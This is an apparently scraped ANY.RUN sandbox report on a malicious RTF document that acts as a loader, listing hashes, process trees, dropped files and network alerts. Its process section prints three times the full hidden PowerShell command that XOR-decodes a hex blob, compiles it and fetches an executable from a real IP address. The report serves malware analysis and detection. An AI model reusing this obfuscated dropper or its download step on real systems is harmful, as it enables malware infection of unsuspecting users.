analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

fd90029398ae983828f26c64e83aa5361c8dccb9.rtf

Full analysis: https://app.any.run/tasks/9618b36d-7bb3-4871-b5c1-3069ae6f2df4
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: July 17, 2019, 10:10:19
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
generated-doc
loader
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5:

73E906A45C1C1E7D32D589C59F577C81

SHA1:

FD90029398AE983828F26C64E83AA5361C8DCCB9

SHA256:

A4C5A5E5BEF3DB8421E69778F99831E530C0B0A35485D2EA86EBF66E6F10A093

SSDEEP:

1536:oZdMFvtGeCOZQmd1EXsgbAnEppBS1DMO8tdaXj9n6V/nM3ACtLgxxdnKFvtGeCOt:oHM39ngneA+39ngneA+39ngneAPtxS

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts Visual C# compiler

      • powershell.exe (PID: 1428)
      • powershell.exe (PID: 1656)
      • powershell.exe (PID: 552)
    • Application was dropped or rewritten from another process

      • e2ae8.exe (PID: 592)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 1428)
    • Downloads executable files from IP

      • powershell.exe (PID: 1428)
  • SUSPICIOUS

    • PowerShell script executed

      • powershell.exe (PID: 1428)
      • powershell.exe (PID: 1656)
      • powershell.exe (PID: 552)
    • Executed via WMI

      • powershell.exe (PID: 1428)
      • powershell.exe (PID: 1656)
      • powershell.exe (PID: 552)
    • Executed via COM

      • EXCEL.EXE (PID: 1888)
      • EXCEL.EXE (PID: 3364)
      • EXCEL.EXE (PID: 2380)
      • excelcnv.exe (PID: 3480)
    • Creates files in the user directory

      • powershell.exe (PID: 1428)
      • powershell.exe (PID: 1656)
      • powershell.exe (PID: 552)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 1428)
  • INFO

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 1888)
      • WINWORD.EXE (PID: 3736)
      • EXCEL.EXE (PID: 3364)
      • EXCEL.EXE (PID: 2380)
      • excelcnv.exe (PID: 3480)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3736)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)

EXIF

RTF

Author: Admin
LastModifiedBy: Admin
CreateDate: 2019:01:07 23:54:00
ModifyDate: 2019:01:07 23:54:00
RevisionNumber: 1
TotalEditTime: -
Pages: 1
Words: -
Characters: 4
CharactersWithSpaces: 4
InternalVersionNumber: 57435
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
52
Monitored processes
15
Malicious processes
1
Suspicious processes
2

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs excel.exe no specs powershell.exe excel.exe no specs powershell.exe no specs excel.exe no specs csc.exe cvtres.exe no specs powershell.exe no specs csc.exe excelcnv.exe no specs cvtres.exe no specs csc.exe cvtres.exe no specs e2ae8.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3736"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\fd90029398ae983828f26c64e83aa5361c8dccb9.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1888"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
1428powershell -WindowStyle Hidden function d8953 { param($t8785d6) $ra2db3 = 'v13a68';$vecffa = ''; for ($i = 0; $i -lt $t8785d6.length; $i+=2) { $ld2ad = [convert]::ToByte($t8785d6.Substring($i, 2), 16); $vecffa += [char]($ld2ad -bxor $ra2db3[($i / 2) % $ra2db3.length]); } return $vecffa; } $ze8ae2b = '03425a0f51182548401553554d444008585f56624a12425d1b1f6114584c1f5c564f7f560254410e466b13434508555d050a46125f5611116018454c135c1d255f59115f5c124251154208144551185613324f4b02545e4f7f774d444008585f56624a12425d1b1f7d0442037b3b431454541f5213025a5905421300050b41530a074d63325d5f285b4819434749145313435d045a0b44131f24584c0448630e5f56020c1126534c26435c02775c12435612451a5f6c1311435a1a585041454c17455a02165d0e45561358183f5f4731424a56590652010913081b28584c26454141435d420451071a4b02435a0f5118195450050e0d4018083a72541a785e11594a0219110a534a18545f52041a5a11760f424a0f615c08584c560c13437a5717557f08544a17434a431f65564146035a5115114015574c1f5213044e4c13435d417f5602614713164e43520a52025a5e4247135f5611115050530c4e18083a72541a785e11594a0219110a534a18545f52041a5a11760f424a0f615c08584c4b136508444c03505f3144570254501514112b11431454541f52131242590258504153400254410f165a195e5f41475d145202497f560261471316561503505404095a647a0f4268024313170f001757074d164d1f5f4741430e430350531a1819444741435118451312505b425207480d63325d5f285b4819434749147313435d045a0b441f570d5a1a5a11760f424a0f615c08584c4b1361155a751947562c535519434a431a182554472d574b02744113594a4b57520d455d5f6c131242590258504153400254410f164e19585741575a105502021e711845631544181e530700520d5a785d15664c041157530700151d5a0f421801525556535a10180811435a1a585041454c17455a02165118451319505c445251581e110d785d15664c04114a02070014110e41400d15080055541012090a54051054000454550c46010b500e0d15005254521a5f18080850100f52025954054b785d15664c041f690444575f4a540e425756545102005c4457081c7f560261471316564309050252051e040056075d4f194a020700141d57590f0d45191152010d150503510e0e43045150010d10060250020d46045650050c45131a480d5110195d540e0e15550e5c7f5602614713186213435c484d5f19455c41535a1507575350030b647a0f426802431315025a435056570b1023785d15664c0418065a435118451305575d410052560b084d5855491749135350501e5643090502521402055154575d401d031902085a5e4615165c17540450570f5f184806594c19115603550e1203555a4b7a0f45563a6b181c505755020a4b4a031905095a014b07501446490a514b033f5f4731424a56575058020a12540e2c574a0559520d18791a5d5c027e7f1a5e51005a104518082c574a0559520d187b19414a495c59120507531a085a575058020a12541f521f0317535505075b5e5f5616167118456315441018040b57555c58655c28584c40051b481d080e01035054115a575058020a12541f521f0313535057520a100b1336535a355d5a04584c565e00070400100c5d044118215451225a51135f47491f0305454108585f5641500707014b745d175f4a195f5e04584c5876561570571a555613665902591b24584e1f435c0f5b5d18451d32465d1558520d70571a555613187906415f08555902585c0f725902501a4a14642a5401005300541a57590f0d451911540e0d42055151021a5f0a5c52500a4e571d25594f185d5c00527e1f5d564952004f040049140913050655010947015050010d4f010151000c10010751570c45005551070d47010550000c41010051040c13060156550d4f010351050d41010051070c47131a4d465b10000a480d68045e5004454b25455213427118575c415b0a45035155020518544441664a19525612456b025041157f56105e1b11555e47081a5a664a1952561245162545521342101b030053540c42180813534c03435d4106030b4146035a5115114015574c1f521312424a1f5f544152004f040049454c04585d06164b450457001f4305454108585f56445655035a100c1117070b17070b430d4b02435a0f511800045058050c140c6015445118561d245b4802480807594a5e585d1516514b0108080a4b450457001874135f54155e031f1a0e531f431448470416504302045053014b725c0f405d04451d35597a0f455649450b4355524f654d144247135f5611195a4d04115a0005480d4e43520a52025a5d0c1b025e5904181b09030b41005658166656445655035a106a1b08190a5f111641435d420451071874135f54155e655f0a4e13534c03435d41400d1508005554030b4c'; $ze8ae2b2 = d8953($ze8ae2b); Add-Type -TypeDefinition $ze8ae2b2; [a337b9f]::xfd2cb9(); C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3364"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
1656powershell -WindowStyle Hidden function d8953 { param($t8785d6) $ra2db3 = 'v13a68';$vecffa = ''; for ($i = 0; $i -lt $t8785d6.length; $i+=2) { $ld2ad = [convert]::ToByte($t8785d6.Substring($i, 2), 16); $vecffa += [char]($ld2ad -bxor $ra2db3[($i / 2) % $ra2db3.length]); } return $vecffa; } $ze8ae2b = '03425a0f51182548401553554d444008585f56624a12425d1b1f6114584c1f5c564f7f560254410e466b13434508555d050a46125f5611116018454c135c1d255f59115f5c124251154208144551185613324f4b02545e4f7f774d444008585f56624a12425d1b1f7d0442037b3b431454541f5213025a5905421300050b41530a074d63325d5f285b4819434749145313435d045a0b44131f24584c0448630e5f56020c1126534c26435c02775c12435612451a5f6c1311435a1a585041454c17455a02165d0e45561358183f5f4731424a56590652010913081b28584c26454141435d420451071a4b02435a0f5118195450050e0d4018083a72541a785e11594a0219110a534a18545f52041a5a11760f424a0f615c08584c560c13437a5717557f08544a17434a431f65564146035a5115114015574c1f5213044e4c13435d417f5602614713164e43520a52025a5e4247135f5611115050530c4e18083a72541a785e11594a0219110a534a18545f52041a5a11760f424a0f615c08584c4b136508444c03505f3144570254501514112b11431454541f52131242590258504153400254410f165a195e5f41475d145202497f560261471316561503505404095a647a0f4268024313170f001757074d164d1f5f4741430e430350531a1819444741435118451312505b425207480d63325d5f285b4819434749147313435d045a0b441f570d5a1a5a11760f424a0f615c08584c4b1361155a751947562c535519434a431a182554472d574b02744113594a4b57520d455d5f6c131242590258504153400254410f164e19585741575a105502021e711845631544181e530700520d5a785d15664c041157530700151d5a0f421801525556535a10180811435a1a585041454c17455a02165118451319505c445251581e110d785d15664c04114a02070014110e41400d15080055541012090a54051054000454550c46010b500e0d15005254521a5f18080850100f52025954054b785d15664c041f690444575f4a540e425756545102005c4457081c7f560261471316564309050252051e040056075d4f194a020700141d57590f0d45191152010d150503510e0e43045150010d10060250020d46045650050c45131a480d5110195d540e0e15550e5c7f5602614713186213435c484d5f19455c41535a1507575350030b647a0f426802431315025a435056570b1023785d15664c0418065a435118451305575d410052560b084d5855491749135350501e5643090502521402055154575d401d031902085a5e4615165c17540450570f5f184806594c19115603550e1203555a4b7a0f45563a6b181c505755020a4b4a031905095a014b07501446490a514b033f5f4731424a56575058020a12540e2c574a0559520d18791a5d5c027e7f1a5e51005a104518082c574a0559520d187b19414a495c59120507531a085a575058020a12541f521f0317535505075b5e5f5616167118456315441018040b57555c58655c28584c40051b481d080e01035054115a575058020a12541f521f0313535057520a100b1336535a355d5a04584c565e00070400100c5d044118215451225a51135f47491f0305454108585f5641500707014b745d175f4a195f5e04584c5876561570571a555613665902591b24584e1f435c0f5b5d18451d32465d1558520d70571a555613187906415f08555902585c0f725902501a4a14642a5401005300541a57590f0d451911540e0d42055151021a5f0a5c52500a4e571d25594f185d5c00527e1f5d564952004f040049140913050655010947015050010d4f010151000c10010751570c45005551070d47010550000c41010051040c13060156550d4f010351050d41010051070c47131a4d465b10000a480d68045e5004454b25455213427118575c415b0a45035155020518544441664a19525612456b025041157f56105e1b11555e47081a5a664a1952561245162545521342101b030053540c42180813534c03435d4106030b4146035a5115114015574c1f521312424a1f5f544152004f040049454c04585d06164b450457001f4305454108585f56445655035a100c1117070b17070b430d4b02435a0f511800045058050c140c6015445118561d245b4802480807594a5e585d1516514b0108080a4b450457001874135f54155e031f1a0e531f431448470416504302045053014b725c0f405d04451d35597a0f455649450b4355524f654d144247135f5611195a4d04115a0005480d4e43520a52025a5d0c1b025e5904181b09030b41005658166656445655035a106a1b08190a5f111641435d420451071874135f54155e655f0a4e13534c03435d41400d1508005554030b4c'; $ze8ae2b2 = d8953($ze8ae2b); Add-Type -TypeDefinition $ze8ae2b2; [a337b9f]::xfd2cb9(); C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2380"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
1492"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\gll-tedv.cmdline"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
8.0.50727.4927 (NetFXspW7.050727-4900)
2536C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESB09.tmp" "c:\Users\admin\AppData\Local\Temp\CSCB08.tmp"C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
8.00.50727.4940 (Win7SP1.050727-5400)
552powershell -WindowStyle Hidden function d8953 { param($t8785d6) $ra2db3 = 'v13a68';$vecffa = ''; for ($i = 0; $i -lt $t8785d6.length; $i+=2) { $ld2ad = [convert]::ToByte($t8785d6.Substring($i, 2), 16); $vecffa += [char]($ld2ad -bxor $ra2db3[($i / 2) % $ra2db3.length]); } return $vecffa; } $ze8ae2b = '03425a0f51182548401553554d444008585f56624a12425d1b1f6114584c1f5c564f7f560254410e466b13434508555d050a46125f5611116018454c135c1d255f59115f5c124251154208144551185613324f4b02545e4f7f774d444008585f56624a12425d1b1f7d0442037b3b431454541f5213025a5905421300050b41530a074d63325d5f285b4819434749145313435d045a0b44131f24584c0448630e5f56020c1126534c26435c02775c12435612451a5f6c1311435a1a585041454c17455a02165d0e45561358183f5f4731424a56590652010913081b28584c26454141435d420451071a4b02435a0f5118195450050e0d4018083a72541a785e11594a0219110a534a18545f52041a5a11760f424a0f615c08584c560c13437a5717557f08544a17434a431f65564146035a5115114015574c1f5213044e4c13435d417f5602614713164e43520a52025a5e4247135f5611115050530c4e18083a72541a785e11594a0219110a534a18545f52041a5a11760f424a0f615c08584c4b136508444c03505f3144570254501514112b11431454541f52131242590258504153400254410f165a195e5f41475d145202497f560261471316561503505404095a647a0f4268024313170f001757074d164d1f5f4741430e430350531a1819444741435118451312505b425207480d63325d5f285b4819434749147313435d045a0b441f570d5a1a5a11760f424a0f615c08584c4b1361155a751947562c535519434a431a182554472d574b02744113594a4b57520d455d5f6c131242590258504153400254410f164e19585741575a105502021e711845631544181e530700520d5a785d15664c041157530700151d5a0f421801525556535a10180811435a1a585041454c17455a02165118451319505c445251581e110d785d15664c04114a02070014110e41400d15080055541012090a54051054000454550c46010b500e0d15005254521a5f18080850100f52025954054b785d15664c041f690444575f4a540e425756545102005c4457081c7f560261471316564309050252051e040056075d4f194a020700141d57590f0d45191152010d150503510e0e43045150010d10060250020d46045650050c45131a480d5110195d540e0e15550e5c7f5602614713186213435c484d5f19455c41535a1507575350030b647a0f426802431315025a435056570b1023785d15664c0418065a435118451305575d410052560b084d5855491749135350501e5643090502521402055154575d401d031902085a5e4615165c17540450570f5f184806594c19115603550e1203555a4b7a0f45563a6b181c505755020a4b4a031905095a014b07501446490a514b033f5f4731424a56575058020a12540e2c574a0559520d18791a5d5c027e7f1a5e51005a104518082c574a0559520d187b19414a495c59120507531a085a575058020a12541f521f0317535505075b5e5f5616167118456315441018040b57555c58655c28584c40051b481d080e01035054115a575058020a12541f521f0313535057520a100b1336535a355d5a04584c565e00070400100c5d044118215451225a51135f47491f0305454108585f5641500707014b745d175f4a195f5e04584c5876561570571a555613665902591b24584e1f435c0f5b5d18451d32465d1558520d70571a555613187906415f08555902585c0f725902501a4a14642a5401005300541a57590f0d451911540e0d42055151021a5f0a5c52500a4e571d25594f185d5c00527e1f5d564952004f040049140913050655010947015050010d4f010151000c10010751570c45005551070d47010550000c41010051040c13060156550d4f010351050d41010051070c47131a4d465b10000a480d68045e5004454b25455213427118575c415b0a45035155020518544441664a19525612456b025041157f56105e1b11555e47081a5a664a1952561245162545521342101b030053540c42180813534c03435d4106030b4146035a5115114015574c1f521312424a1f5f544152004f040049454c04585d06164b450457001f4305454108585f56445655035a100c1117070b17070b430d4b02435a0f511800045058050c140c6015445118561d245b4802480807594a5e585d1516514b0108080a4b450457001874135f54155e031f1a0e531f431448470416504302045053014b725c0f405d04451d35597a0f455649450b4355524f654d144247135f5611195a4d04115a0005480d4e43520a52025a5d0c1b025e5904181b09030b41005658166656445655035a106a1b08190a5f111641435d420451071874135f54155e655f0a4e13534c03435d41400d1508005554030b4c'; $ze8ae2b2 = d8953($ze8ae2b); Add-Type -TypeDefinition $ze8ae2b2; [a337b9f]::xfd2cb9(); C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3472"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\vm6iqtzo.cmdline"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
8.0.50727.4927 (NetFXspW7.050727-4900)
Total events
2 709
Read events
2 141
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
6
Text files
5
Unknown types
5

Dropped files

PID
Process
Filename
Type
3736WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRF57C.tmp.cvr
MD5:
SHA256:
1888EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRFF9E.tmp.cvr
MD5:
SHA256:
3364EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR5F7.tmp.cvr
MD5:
SHA256:
1428powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FJUO6FT39H48CM6FXUTV.temp
MD5:
SHA256:
2380EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRA0E.tmp.cvr
MD5:
SHA256:
1656powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RE44ATZYBA9BEVVO0LYN.temp
MD5:
SHA256:
2536cvtres.exeC:\Users\admin\AppData\Local\Temp\RESB09.tmp
MD5:
SHA256:
1492csc.exeC:\Users\admin\AppData\Local\Temp\gll-tedv.dll
MD5:
SHA256:
1492csc.exeC:\Users\admin\AppData\Local\Temp\gll-tedv.out
MD5:
SHA256:
3472csc.exeC:\Users\admin\AppData\Local\Temp\CSCF7C.tmp
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1428
powershell.exe
GET
200
35.225.200.121:80
http://35.225.200.121/DD/106597
US
executable
598 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1428
powershell.exe
35.225.200.121:80
US
suspicious

DNS requests

No data

Threats

PID
Process
Class
Message
1428
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
1428
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
1428
powershell.exe
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
Process
Message
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144